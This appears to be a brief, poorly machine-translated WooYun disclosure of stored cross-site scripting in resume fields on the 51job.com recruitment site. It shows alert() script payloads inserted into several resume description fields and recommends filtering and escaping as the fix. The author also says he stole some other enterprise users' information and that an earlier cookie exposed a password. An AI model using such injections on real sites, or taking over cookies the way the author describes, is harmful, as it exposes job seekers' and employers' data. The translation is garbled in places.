Brief description: 51job.com resumes multi-Local Storage XSS, which leads to some information that enterprise users can access. The application for enterprise users requires verification and no tests are conducted.
However, some information about other enterprise users is obtained.
Description: inserted.
Proof of vulnerability:
<Td id = "Cur_Val" valign = "top"> <script> alert ("Cross-Site self-evaluation") </script> </td>
<Td id = "Cur_Val" colspan = "2" valign = "top"> <script> alert ("work description cross-site") </script> </td>
<Td width = "84%" id = "Cur_Val" valign = "top"> <script> alert ("project description cross-site") </script> </td>
<Td id = "Cur_Val" valign = "top"> <script> alert ("Cross-Site responsibility description") </script> </td>
<Td id = "Cur_Val" colspan = "4" valign = "top" height = "30"> <script> alert ("professional description cross-site ") </script> </td>
<Td width = "86%" id = "Cur_Val"> <script> alert ("cross-site content") </script> </td>
All trees have filters or something. As long as you insert.
Here is a little bit of stealing ..
I'm not sure why I can't steal other information.
The previous day's cookie contains a password.
Now it's gone.
Solution: Filter and escape.
Author Tea @ wooyun